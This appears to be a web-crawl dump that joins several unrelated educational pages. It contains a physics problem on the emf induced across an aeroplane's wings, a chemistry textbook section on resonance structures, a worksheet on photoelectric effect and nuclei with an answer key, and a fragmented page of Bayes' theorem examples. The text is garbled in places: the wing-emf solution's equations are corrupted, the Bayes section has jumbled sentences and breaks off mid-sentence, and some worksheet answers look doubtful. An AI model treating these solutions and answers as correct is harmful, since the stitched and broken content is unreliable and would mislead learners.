msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:89886c6e-9b09-49dc-a751-3f9939e85e24>\",\"WARC-Concurrent-To\":\"<urn:uuid:30f895fc-f7bd-4706-842e-d560375687fa>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://computergraphics.stackexchange.com/questions/4703/algorithm-to-map-a-triangular-mesh-onto-plane-preserving-angles-and-distances-fr\",\"WARC-Payload-Digest\":\"sha1:PVZ3LI57WERLQ6TB6GDOL4XSOQ3BJ37J\",\"WARC-Block-Digest\":\"sha1:4U47SXCDIV5MAUILUHQZW6CX7QLCG4XF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588053.38_warc_CC-MAIN-20211027022823-20211027052823-00193.warc.gz\"}"}
https://www.esaral.com/q/an-aeroplane-with-its-wings-spread-10-m-55019
[ "# An aeroplane, with its wings spread 10 m,\n\nQuestion:\n\nAn aeroplane, with its wings spread $10 \\mathrm{~m}$, is flying at a speed of $180 \\mathrm{~km} / \\mathrm{h}$ in a horizontal direction. The total intensity of earth's field at that part is $2.5 \\times 10^{-4} \\mathrm{~Wb} / \\mathrm{m}^{2}$ and the angle of dip is $60^{\\circ}$. The emf induced between the tips of the plane wings will be\n\n1. (1) $88.37 \\mathrm{mV}$\n\n2. (2) $62.50 \\mathrm{mV}$\n\n3. (3) $54.125 \\mathrm{mV}$\n\n4. (4) $108.25 \\mathrm{mV}$\n\nCorrect Option: , 4\n\nSolution:", null, "$\\sum=B \\perp v \\xi$\n\n$\\sin 60^{\\circ}-\\frac{B_{n}}{u}$", null, "$\\frac{\\sqrt{3}}{2}=\\frac{B_{3}}{B}$\n\n$B V=\\frac{\\sqrt{3}}{2} B$\n\n$E=\\frac{\\sqrt{3}}{2} B \\ell v$\n\n$=\\frac{\\sqrt{3}}{2} \\times 2.5 \\times 10^{-4} \\times 10 \\times 180 \\times \\frac{5}{18}$\n\n$=\\frac{\\sqrt{3}}{2} \\times 2.5 \\times 5 \\times 10^{-2}=10.825 \\times 10^{-2}=108.25 \\mathrm{mV}$" ]
[ null, "https://www.esaral.com/media/uploads/2022/01/12/image91040.png", null, "https://www.esaral.com/media/uploads/2022/01/12/image14311.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5334352,"math_prob":1.0000069,"size":716,"snap":"2023-14-2023-23","text_gpt3_token_len":290,"char_repetition_ratio":0.2008427,"word_repetition_ratio":0.0,"special_character_ratio":0.4567039,"punctuation_ratio":0.083333336,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999931,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-04-01T13:09:44Z\",\"WARC-Record-ID\":\"<urn:uuid:84ff0449-dc2e-4032-b5c6-12317f7711be>\",\"Content-Length\":\"24678\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f4f8da50-656a-4bcd-b284-acd169edf212>\",\"WARC-Concurrent-To\":\"<urn:uuid:4ba08a57-21fe-44ae-a68b-f135007f1118>\",\"WARC-IP-Address\":\"104.21.61.187\",\"WARC-Target-URI\":\"https://www.esaral.com/q/an-aeroplane-with-its-wings-spread-10-m-55019\",\"WARC-Payload-Digest\":\"sha1:Q6GYGSKR3PSQ7O7PDJSYBEL2XYFWYOZJ\",\"WARC-Block-Digest\":\"sha1:YN4TJIRV55KFQGCV36V72QLEB5FY26GV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296950030.57_warc_CC-MAIN-20230401125552-20230401155552-00540.warc.gz\"}"}
https://chem.libretexts.org/Bookshelves/Organic_Chemistry/Organic_Chemistry_(McMurry)/02%3A_Polar_Covalent_Bonds_Acids_and_Bases/2.04%3A_Resonance
[ "# 2.4: Resonance\n\n$$\\newcommand{\\vecs}{\\overset { \\rightharpoonup} {\\mathbf{#1}} }$$ $$\\newcommand{\\vecd}{\\overset{-\\!-\\!\\rightharpoonup}{\\vphantom{a}\\smash {#1}}}$$$$\\newcommand{\\id}{\\mathrm{id}}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\kernel}{\\mathrm{null}\\,}$$ $$\\newcommand{\\range}{\\mathrm{range}\\,}$$ $$\\newcommand{\\RealPart}{\\mathrm{Re}}$$ $$\\newcommand{\\ImaginaryPart}{\\mathrm{Im}}$$ $$\\newcommand{\\Argument}{\\mathrm{Arg}}$$ $$\\newcommand{\\norm}{\\| #1 \\|}$$ $$\\newcommand{\\inner}{\\langle #1, #2 \\rangle}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\id}{\\mathrm{id}}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$ $$\\newcommand{\\kernel}{\\mathrm{null}\\,}$$ $$\\newcommand{\\range}{\\mathrm{range}\\,}$$ $$\\newcommand{\\RealPart}{\\mathrm{Re}}$$ $$\\newcommand{\\ImaginaryPart}{\\mathrm{Im}}$$ $$\\newcommand{\\Argument}{\\mathrm{Arg}}$$ $$\\newcommand{\\norm}{\\| #1 \\|}$$ $$\\newcommand{\\inner}{\\langle #1, #2 \\rangle}$$ $$\\newcommand{\\Span}{\\mathrm{span}}$$\n\n##### Objective\n\nAfter completing this section, you should be able to\n\n• draw resonance forms for molecules and ions.\n##### Key Terms\n\nMake certain that you can define, and use in context, the key term below.\n\n• resonance form\n• delocalization\n\n## Resonance Delocalization\n\nSometimes, even when formal charges are considered, the bonding in some molecules or ions cannot be described by a single Lewis structure. Resonance is a way of describing delocalized electrons within certain molecules or polyatomic ions where the bonding cannot be expressed by a single Lewis formula. A molecule or ion with such delocalized electrons is represented by several contributing structures (also called resonance contributors or canonical forms). Resonance contributors involve the ‘imaginary movement’ of pi-bonded electrons or of lone-pair electrons that are adjacent to pi bonds. Note, sigma bonds cannot be broken during resonance – if you show a sigma bond forming or breaking, you are showing a chemical reaction taking place. Likewise, the positions of atoms in the molecule cannot change between resonance contributors.\n\nWhen looking at the structure of the molecule, formate, we see that there are two equivalent structures possible. Which one is correct? There are two simple answers to this question: 'both' and 'neither one'. Both ways of drawing the molecule are equally acceptable approximations of the bonding picture for the molecule, but neither one, by itself, is an accurate picture of the delocalized pi bonds. The two alternative drawings, however, when considered together, give a much more accurate picture than either one on its own. This is because they imply, together, that the carbon-carbon bonds are not double bonds, not single bonds, but about halfway in between.", null, "Formate Ion Structures are Equivalent in Energy\n\nWhen it is possible to draw more than one valid structure for a compound or ion, we have identified resonance contributors: two or more different Lewis structures depicting the same molecule or ion that, when considered together, do a better job of approximating delocalized pi-bonding than any single structure. By convention, resonance contributors are linked by a double-headed arrow, and are sometimes enclosed by brackets:", null, "The depiction of formate using the two resonance contributors A and B in the figure above does not imply that the molecule at one moment looks like structure A, then at the next moment shifts to look like structure B. Rather, at all moments, the molecule is a combination, or resonance hybrid of both A and B. Each individual resonance contributor of the formate ion is drawn with one carbon-oxygen double bond (120 pm) and one carbon-oxygen single bond (135 pm), with a negative formal charge located on the single-bonded oxygen. However, the two carbon-oxygen bonds in formate are actually the same length (127 pm) which implies that neither resonance contributor is correct. Although there is an overall negative formal charge on the formate ion, it is shared equally between the two oxygens. Therefore, the formate ion can be more accurately depicted by a pair of resonance contributors. Alternatively, a single structure can be used, with a dashed line depicting the resonance-delocalized pi bond and the negative charge located in between the two oxygens.", null, "The electrostatic potential map of formate shows that there is an equal amount of electron density (shown in red) around each oxygen.", null, "Valence bond theory can be used to develop a picture of the bonding in a carboxylate group. We know that the carbon must be sp2-hybridized, (the bond angles are close to 120˚, and the molecule is planar), and we will treat both oxygens as being sp2-hybridized as well. Both carbon-oxygen sigma bonds, then, are formed from the overlap of carbon sp2 orbitals and oxygen sp2 orbitals.", null, "In addition, the carbon and both oxygens each have an un-hybridized 2pz orbital situated perpendicular to the plane of the sigma bonds. These three 2pz orbitals are parallel to each other, and can overlap in a side-by-side fashion to form a delocalized pi bond.", null, "", null, "Overall, the situation is one of three parallel, overlapping 2pz orbitals sharing four delocalized pi electrons. Because there is one more electron than there are 2pz orbitals, the system has an overall charge of 1–. Resonance contributors are used to approximate overlapping 2pz orbitals and delocalized pi electrons. Molecules with resonance are usually drawn showing only one resonance contributor for the sake of simplicity. However, identifying molecules with resonance is an important skill in organic chemistry.\n\nThis example shows an important exception to the general rules for determining the hybridization of an atom. The oxygen with the negative charge appears to be sp3 hybridized because it is surrounded by four electron groups. However, this representation of the oxygen atom is not correct because it is actually part of a resonance hybrid. A pair of lone pair of electrons on the negatively charged oxygen are not localized in an sp3 orbital, rather, they are delocalized as part of a conjugated pi system. The stability gained though resonance is enough to cause the expected sp3 to become sp2. The sp2 hybridization gives the oxygen a p orbital allowing it to participate in conjugation. As a general rule sp3 hybridized atoms with lone pair electrons tend to become sp2 hybridized when adjacent to a conjugated system.", null, "### Example: Carbonate (CO32−)\n\nLike formate, the electronic structure of the carbonate ion cannot be described by a single Lewis electron structure. Unlike O3, though, the Lewis structures describing CO32 has three equivalent representations.", null, "1. Because carbon is the least electronegative element, we place it in the central position:", null, "2. Carbon has 4 valence electrons, each oxygen has 6 valence electrons, and there are 2 more for the 2− charge. This gives 4 + (3 × 6) + 2 = 24 valence electrons.\n\n3. Six electrons are used to form three bonding pairs between the oxygen atoms and the carbon:", null, "4. We divide the remaining 18 electrons equally among the three oxygen atoms by placing three lone pairs on each and indicating the 2− charge:", null, "5. There are no electrons left for the central atom.", null, "6. At this point, the carbon atom has only 6 valence electrons, so we must take one lone pair from an oxygen and use it to form a carbon–oxygen double bond. In this case, however, there are three possible choices:", null, "As with formate, none of these structures describes the bonding exactly. Each predicts one carbon–oxygen double bond and two carbon–oxygen single bonds, but experimentally all C–O bond lengths are identical. We can write resonance structures (in this case, three of them) for the carbonate ion:", null, "As the case for formate, the actual structure involves the formation of a molecular orbital from pz orbitals centered on each atom and sitting above and below the plane of the CO32 ion.", null, "##### Example 2.4.1\n\nBenzene is a common organic solvent that was previously used in gasoline; it is no longer used for this purpose, however, because it is now known to be a carcinogen. The benzene molecule (C6H6) consists of a regular hexagon of carbon atoms, each of which is also bonded to a hydrogen atom. Use resonance structures to describe the bonding in benzene.\n\nGiven: molecular formula and molecular geometry\n\nStrategy:\n\nA Draw a structure for benzene illustrating the bonded atoms. Then calculate the number of valence electrons used in this drawing.\n\nB Subtract this number from the total number of valence electrons in benzene and then locate the remaining electrons such that each atom in the structure reaches an octet.\n\nC Draw the resonance structures for benzene.\n\nSolution:\n\nA Each hydrogen atom contributes 1 valence electron, and each carbon atom contributes 4 valence electrons, for a total of (6 × 1) + (6 × 4) = 30 valence electrons. If we place a single bonding electron pair between each pair of carbon atoms and between each carbon and a hydrogen atom, we obtain the following:", null, "Each carbon atom in this structure has only 6 electrons and has a formal charge of 1+, but we have used only 24 of the 30 valence electrons.\n\nB If the 6 remaining electrons are uniformly distributed pair-wise on alternate carbon atoms, we obtain the following:", null, "Three carbon atoms now have an octet configuration and a formal charge of 1−, while three carbon atoms have only 6 electrons and a formal charge of 1+. We can convert each lone pair to a bonding electron pair, which gives each atom an octet of electrons and a formal charge of 0, by making three C=C double bonds.\n\nC There are, however, two ways to do this:", null, "Each structure has alternating double and single bonds, but experimentation shows that each carbon–carbon bond in benzene is identical, with bond lengths (139.9 pm) intermediate between those typically found for a C–C single bond (154 pm) and a C=C double bond (134 pm). We can describe the bonding in benzene using the two resonance structures, but the actual electronic structure is an average of the two. The existence of multiple resonance structures for aromatic hydrocarbons like benzene is often indicated by drawing either a circle or dashed lines inside the hexagon:\n\nThis combination of p orbitals for benzene can be visualized as a ring with a node in the plane of the carbon atoms. As can be seen in an electrostatic potential map of benzene, the electrons are distributed symmetrically around the ring.", null, "##### Exercise $$\\PageIndex{1}$$\n\nThe sodium salt of nitrite is used to relieve muscle spasms. Draw two resonance structures for the nitrite ion (NO2).", null, "## Exercises\n\n#### Questions\n\nQ2.4.1\n\nDraw the resonance structures for the following molecule:", null, "#### Solutions\n\nS2.4.1", null, "### Extra example - O3\n\nA molecule or ion with such delocalized electrons is represented by several contributing structures (also called resonance structures or canonical forms). Such is the case for ozone (O3), an allotrope of oxygen with a V-shaped structure and an O–O–O angle of 117.5°.\n\n1. We know that ozone has a V-shaped structure, so one O atom is central:", null, "", null, "2. Each O atom has 6 valence electrons, for a total of 18 valence electrons.", null, "3. Assigning one bonding pair of electrons to each oxygen–oxygen bond gives", null, "with 14 electrons left over.", null, "4. If we place three lone pairs of electrons on each terminal oxygen, we obtain", null, "and have 2 electrons left over.", null, "5. At this point, both terminal oxygen atoms have octets of electrons. We therefore place the last 2 electrons on the central atom:", null, "6. The central oxygen has only 6 electrons. We must convert one lone pair on a terminal oxygen atom to a bonding pair of electrons—but which one? Depending on which one we choose, we obtain either", null, "Which is correct? In fact, neither is correct. Both predict one O–O single bond and one O=O double bond. If the bonds were of different types (one single and one double, for example), they would have different lengths. It turns out, however, that both O–O bond distances are identical, 127.2 pm, which is shorter than a typical O–O single bond (148 pm) and longer than the O=O double bond in O2 (120.7 pm).", null, "Equivalent Lewis dot structures, such as those of ozone, are called resonance structures . The position of the atoms is the same in the various resonance structures of a compound, but the position of the electrons is different. Double-headed arrows link the different resonance structures of a compound:", null, "The resonance structure of ozone involves a molecular orbital extending all three oxygen atoms.In ozone, a molecular orbital extending over all three oxygen atoms is formed from three atom centered pz orbitals. Similar molecular orbitals are found in every resonance structure.", null, "" ]
[ null, "https://chem.libretexts.org/@api/deki/files/370022/resonance_structures_for_the_formate_ion.svg", null, "https://chem.libretexts.org/@api/deki/files/370023/resonance_contributors_A_and_B%252C_connected_with_a_double-headed_resonance_arrow.svg", null, "https://chem.libretexts.org/@api/deki/files/370024/resonance_hybrids_of_formate_ion.svg", null, "https://chem.libretexts.org/@api/deki/files/342729/clipboard_e87fbaca1cf21cf4746bc97f1a9669a70.png", null, "https://chem.libretexts.org/@api/deki/files/4624/image059.png", null, "https://chem.libretexts.org/@api/deki/files/370031/electron_distribution_in_p-orbitals_for_the_formate_ion.png", null, "https://chem.libretexts.org/@api/deki/files/370032/resonance_structures_for_the_formate_ion%252C_labeled_A_and_B.svg", null, "https://chem.libretexts.org/@api/deki/files/370025/hybridization_of_the_oxygen_atoms_on_the_formate_ion_versus_the_methoxide_ion.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370026/carbonate_ion_example_-_step_1_-_atoms_arranged_with_carbon_in_the_middle.svg", null, "https://chem.libretexts.org/@api/deki/files/370027/carbonate_ion_example_-_step_3_-_atoms_connected_with_single_bonds.svg", null, "https://chem.libretexts.org/@api/deki/files/370028/carbonate_ion_example_-_step_4_-_atoms_connected_with_single_bonds_and_lone_pairs_filled_in.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370029/carbonate_ion_example_-_step_6_-_three_possible_resonance_forms.svg", null, "https://chem.libretexts.org/@api/deki/files/370030/carbonate_ion_example_-_step_6_-_final_resonance_structures_connected_with_resonance_arrows.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370033/benzene_example_-_step_a_-_atoms_connected_with_single_bonds.svg", null, "https://chem.libretexts.org/@api/deki/files/370034/benzene_example_-_step_b_-_atoms_connected_with_single_bonds_and_lone_pairs_filled_in.svg", null, "https://chem.libretexts.org/@api/deki/files/370035/benzene_example_-_step_c_-_carbon_atoms_connected_with_alternating_single_and_double_bonds.svg", null, "https://chem.libretexts.org/@api/deki/files/342730/clipboard_e372908dc8b5aa4ed8683b971ec0b46ce.png", null, "https://chem.libretexts.org/@api/deki/files/28129/1e6377431bae8a12f8127b8b1bf7588c.jpg", null, "https://chem.libretexts.org/@api/deki/files/92172/2-4qu.png", null, "https://chem.libretexts.org/@api/deki/files/92173/2.4.png", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370037/ozone_example_-_step_1_-_atoms_arranged_with_oxyen_in_the_center.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370038/ozone_example_-_step_5_-_completing_the_octet_of_the_central_oxygen.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370039/ozone_example_-_step_4_-_atoms_connected_with_single_bonds_and_lone_pairs_filled_in_on_terminal_oxygens.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/370038/ozone_example_-_step_5_-_completing_the_octet_of_the_central_oxygen.svg", null, "https://chem.libretexts.org/@api/deki/files/370041/ozone_example_-_step_6_-_two_possible_resonance_forms.svg", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null, "https://chem.libretexts.org/@api/deki/files/28119/ozone.png", null, "http://a.mtstatic.com/skins/common/icons/icon-trans.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91858166,"math_prob":0.9829504,"size":11542,"snap":"2022-05-2022-21","text_gpt3_token_len":2488,"char_repetition_ratio":0.16406657,"word_repetition_ratio":0.022691293,"special_character_ratio":0.20533703,"punctuation_ratio":0.10372093,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96465945,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,null,null,7,null,7,null,7,null,null,null,7,null,7,null,null,null,7,null,7,null,7,null,7,null,9,null,7,null,7,null,null,null,4,null,null,null,8,null,null,null,4,null,null,null,8,null,4,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-20T00:55:56Z\",\"WARC-Record-ID\":\"<urn:uuid:706b9fc6-3ab1-4727-ba6e-d3aea1f14f7c>\",\"Content-Length\":\"134584\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1a8aee9d-94f1-48f4-8705-73406175fa61>\",\"WARC-Concurrent-To\":\"<urn:uuid:6e90f594-f1ae-4dd0-aff0-01a22760c2fc>\",\"WARC-IP-Address\":\"13.249.39.14\",\"WARC-Target-URI\":\"https://chem.libretexts.org/Bookshelves/Organic_Chemistry/Organic_Chemistry_(McMurry)/02%3A_Polar_Covalent_Bonds_Acids_and_Bases/2.04%3A_Resonance\",\"WARC-Payload-Digest\":\"sha1:KGDJXCL64VMP4NQC5LDJ7PPKVBSKV33B\",\"WARC-Block-Digest\":\"sha1:UX77KS242MKUMJ4W7T6F65TLOOFIGSJQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662530553.34_warc_CC-MAIN-20220519235259-20220520025259-00300.warc.gz\"}"}
https://www.guidephysics.com/post/worksheet-on-chapter-11-dual-nature-of-radiation-matter
[ "G-MS2D75B7RR\n\n# Worksheet on Dual Nature, Atoms & Nuclei\n\nQ1 The energy of photon of visible light with maximum wavelength in eV is :\n\na) 1\n\nb) 1.6\n\nc) 3.2\n\nd) 7\n\nQ2 The strength of photoelectric current is directly proportional to :\n\na) Frequency of incident radiation\n\nb) Intensity of incident radiation\n\nc) Angle of incidence of radiation\n\nd) Distance between anode and cathode\n\nQ3 When light is incident on surface, photo electrons are emitted. For photoelectrons :\n\na) The value of kinetic energy is same for\n\nb) Maximum kinetic energy do not depend on the wave length of incident light\n\nc) The value of kinetic energy is equal to or less than a maximum kinetic energy\n\nd) None of the above.\n\nQ4 When light falls on a photosensitive surface, electrons are emitted from the surface. The kinetic energy of these electrons does not depend on the :\n\na) Wavelength of light\n\nb) Frequency of light\n\nc) Type of material used for the surface\n\nd) Intensity of light\n\nQ5 The work-function of a substance is 4.0 eV. The longest wavelength of light that can cause photoelectron emission from this substance is approximately :\n\na) 450 nm\n\nb) 400 nm\n\nc) 310 nm\n\nd) 220 nm\n\nQ6 Which one among shows particle nature of light.\n\na) P.E.E.\n\nb) Interference\n\nc) Refraction\n\nd) Polarization\n\nQ7 According to Einstein’s photoelectric equation, the plot of the kinetic energy of the emitted photoelectrons from a metal v/s the frequency of the incident radiation gives a straight line whose slope :\n\na) Depends on the intensity of the radiation\n\nb) Depends of the nature of the metal used\n\nc) Depends both on the intensity of the radiation and the metal used.\n\nd) Is the same for all metals and independent of the intensity of the radiation.\n\nQ8 The De Broglie wavelength of an electron in the first bohr orbit is :\n\na) Equal to the circumference of the first orbit\n\nb) Equal to twice the circumference of the first orbit\n\nc) Equal to half the circumference of the first orbit.\n\nd) Equal to one fourth the circumference of first orbit\n\nQ9 A photo-cell employs photoelectric effect to convert.\n\na) Change in the frequency of light into a change in electric voltage\n\nb) Change in the intensity of illumination into a change in photoelectric current\n\nc) Change in the intensity of illumination into a change in the work function of the photocathode\n\nd) Change in the frequency of light into a change in the electric current\n\nQ10 Assertion :- Photoelectric effect demonstrates the wave nature of light.\n\nReason :-The number of photo electrons is properties to the frequency of light.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ11 Assertion :- A photon is not a material particle. It is a quanta of energy.\n\nReason :- Photoelectric effect demonstrate wave nature of radiation.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ12 Assertion :- Among the particles of same kinetic energy; lighter particle has greater de Broglie wavelength.\n\nReason :-The de-Broglie wavelength of a particle depends only on the charge of the particle.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ13 Assertion :- Speed of light is independent of frame of reference.\n\nReason :- Speed of light is the ultimate speed of particle.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ14 As the mass number increases, binding energy per nucleon :-\n\na) Increases\n\nb) decreases\n\nc) remains same\n\nd) may increase or may decrease\n\nQ15 Possible forces on a proton by a proton in a nucleus is/are :-\n\na) Coulomb force\n\nb) Nuclear\n\nc) Gravitational force\n\nd) All of these\n\nQ16 Energy is released in nuclear fission is due to.\n\n(a) Few mass is converted into energy\n\n(b) Total binding energy of fragments is more than the B.E. of parental element\n\n(c) Total B.E. of fragments is less than the B.E. of parental element\n\n(d) Total B.E. of fragments is equals to the B.E. of parental element is\n\na) a,c\n\nb) a,b\n\nc) a,d\n\nd) All\n\nQ17 Energy in an atom bomb is produced by the process of :\n\na) nuclear fusion\n\nb) nuclear fission\n\nc) combination of hydrogen atoms\n\nd) combination of electrons and protons\n\nQ18 Which of the following is weakest force :-\n\na) Gravitational force\n\nb) Electric force\n\nc) Magnetic force\n\nd) Nuclear force\n\nQ19 Neutrino is a particle, which is :\n\na) charged like an electron and has no spin\n\nb) chargeless and has spin\n\nc) chargeless and has no spin\n\nd) charged like an electron and has spin\n\nQ20 Which of the following statement is incorrect :-\n\na) Nuclear forces are always attractive\n\nb) Nuclear force are stronger than Colombian force at distance of femtometer\n\nc) Nuclear force are repulsive at distance less than 0.8 femtometer\n\nd) Nuclear forces are spin dependent\n\nQ21 Assertion :- A heavy nucleus may also undergo fission to give two fission fragments.\n\nReason :- A heavy nucleus has a smaller coulomb force.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ22 Assertion :- Heavy nuclei are highly unstable.\n\nReason :- In heavy nuclei, neutrons are much greater than protons.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ23 Assertion :- X-rays are high energy photons.\n\nReason :- -particles are helium nuclei.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\nQ24 Assertion :- Soft and hard X-rays differ in frequency only.\n\nReason :- Hard X-rays propagate at higher speed than soft X-rays.\n\na) A\n\nb) B\n\nc) C\n\nd) D\n\n1) b\n\n2) b\n\n3) c\n\n4) d\n\n5) c\n\n6) a\n\n7) d\n\n8) a\n\n9) b\n\n10) d\n\n11) c\n\n12) c\n\n13) b\n\n14) d\n\n15) d\n\n16) b\n\n17) b\n\n18) a\n\n19) b\n\n20) a\n\n21) c\n\n22) b\n\n23) b\n\n24) c" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7331079,"math_prob":0.95862687,"size":5088,"snap":"2022-40-2023-06","text_gpt3_token_len":1363,"char_repetition_ratio":0.12922895,"word_repetition_ratio":0.090431124,"special_character_ratio":0.254717,"punctuation_ratio":0.08019324,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9894258,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-05T12:21:19Z\",\"WARC-Record-ID\":\"<urn:uuid:59ef6588-ee96-4a4d-bb36-aa3ecd18761f>\",\"Content-Length\":\"848926\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58237be0-2487-4c2d-8f44-56fad2008af8>\",\"WARC-Concurrent-To\":\"<urn:uuid:23438536-2764-4e12-a087-74132e951e49>\",\"WARC-IP-Address\":\"34.117.168.233\",\"WARC-Target-URI\":\"https://www.guidephysics.com/post/worksheet-on-chapter-11-dual-nature-of-radiation-matter\",\"WARC-Payload-Digest\":\"sha1:VQZMND6FTDWCBZVRWVWNQHWZW6OBN4QB\",\"WARC-Block-Digest\":\"sha1:FZWJCAYCUHZS23PTHXCYC5ULOAAQY55S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337625.5_warc_CC-MAIN-20221005105356-20221005135356-00747.warc.gz\"}"}
http://votesforvinny.org.uk/forum/forum/3mg3r17.php?c04f82=street-fighter-5-season-2-characters
[ "data appear in Bayesian results; Bayesian calculations condition on D obs. Probability and Statistics > Probability > Bayes’ Theorem Problems. It may be a good exercise to spend an hour or two working problems to become facile with these probability rules and to think in terms of probability. 0.20    1/11 Bayes’ theorem tells you: “Being an alcoholic” is the test(kind of like a litmus test) for liver disease. P(A|X) = (.9 * .01) / (.9 * .01 + .096 * .99) = 0.0865 (8.65%). That’s given as 5%. Assume inferences are based on a random sample of 100 Duke students. Event B is being an addict. DNA test, you believe there is a 75% chance that the alleged father is Should Steve’s friend be worried by his positive result? Here is the pdf. With Chegg Study, you can get step-by-step solutions to your questions from an expert in the field. Decide whether the following statements are true or false. 2. For example, Gaussian mixture models, for classification, or Latent Dirichlet Allocation, for topic modelling, are both graphical models requiring to solve such a problem when fitting the data. So, if you were to bet on the winner of next race, who would he be ? The Cartoon Guide to Statistics. have already measured that p has a Gaussian distribution with mean 0.35 and r.m.s. If you already have cancer, you are in the first column. Assume inferences are Angioplasty. 50% chance that this child will have blood type B if this alleged (0.9 * 0.01) / ((0.9 * 0.01) + (0.08 * 0.99) = 0.10. describe SAT scores for Duke students. Watch the video for a quick example of working a Bayes’ Theorem problem, or read the examples below: You might be interested in finding out a patient’s probability of having liver disease if they are an alcoholic. 1. father is the real father. Bayes' theorem to find conditional porbabilities is explained and used to solve examples including detailed explanations. Need help with a homework or test question? But it’s still unlikely that any particular patient has liver disease. 3. arteries. The disease occurs infrequently in the general population. is the number corresponding to the top of the hill in the likelihood That information is in the italicized part of this particular question. (e.g., testimonials, physical evidence, records) presented before the For this problem, actually having cancer is A and a positive test result is X. P(X|A)=0.9 0.60    1/11 One percent of women over 50 have breast cancer. are widened by inserting and partially filling a balloon in the In other words, find what (B|A) is. 0.90    1/11 You probably won’t encounter any of these other forms in an elementary stats class. problems. The main difference with this form of the equation is that it uses the probability terms intersection(∩) and complement (c). chance that the alleged father is in fact the real father, given that Bayesian statistics is a theory in the field of statistics based on the Bayesian interpretation of probability where probability expresses a degree of belief in an event.The degree of belief may be based on prior knowledge about the event, such as the results of previous … the following distribution: Step 3: Figure out the probability of getting a positive result on the test. b)  What is the posterior probability that p exceeds 50%? Let E 1,E 2,E 3 be events. What is the The probability ratio rule states that any event (like a patient having liver disease) must be multiplied by this factor PR(H,E)=PE(H)/P(H). I’ve used similar numbers, but the question is worded differently to give you another opportunity to wrap your mind around how you decide which is event A and which is event X. Q. Given the following statistics, what is the probability that a woman has cancer if she has a positive mammogram result? Bayes’ Theorem looks simple in mathematical expressions such as; Now, we need to use Bayes Rule to update it for the results of 2 if also: (d) The host is one of two (M1 & M2) who take turns hosting on alternate nights (e) If given a choice, M1 opens door with lowest number, & M2 flips a coin (f) You randomly chose a night on … Divide the chance of having a real, positive result (Step 1) by the chance of getting any kind of positive result (Step 3) = .009/.10404 = 0.0865 (8.65%). You might be interested in finding out a patient’s probability of having liver disease if they are an alcoholic. Step 2: Find the probability of a false positive on the test. a)  In classical inference, the probability, Pr(mu > 1400), “Events” Are different from “tests.” For example, there is a, You might also know that among those patients diagnosed with liver disease, 7% are alcoholics. For example, the timing of the message, or how often the filter has seen the same content before, are two other spam tests. Laboratories make genetic determinations concerning the mother, A short introduction to Bayesian statistics, part I Math 218, Mathematical Statistics D Joyce, Spring 2016 I’ll try to make this introduction to Bayesian statistics clear and short. 5. 0.05? And here is a bunch of R code for the examples and, I think, exercises from the book. 11.3 The Monte Carlo Method. “Being an alcoholic” is the test (kind of like a litmus test) for liver disease. For example, one version uses what Rudolf Carnap called the “probability ratio“. The test accurately identifies people who have the disease, but gives false positives in 1 out of 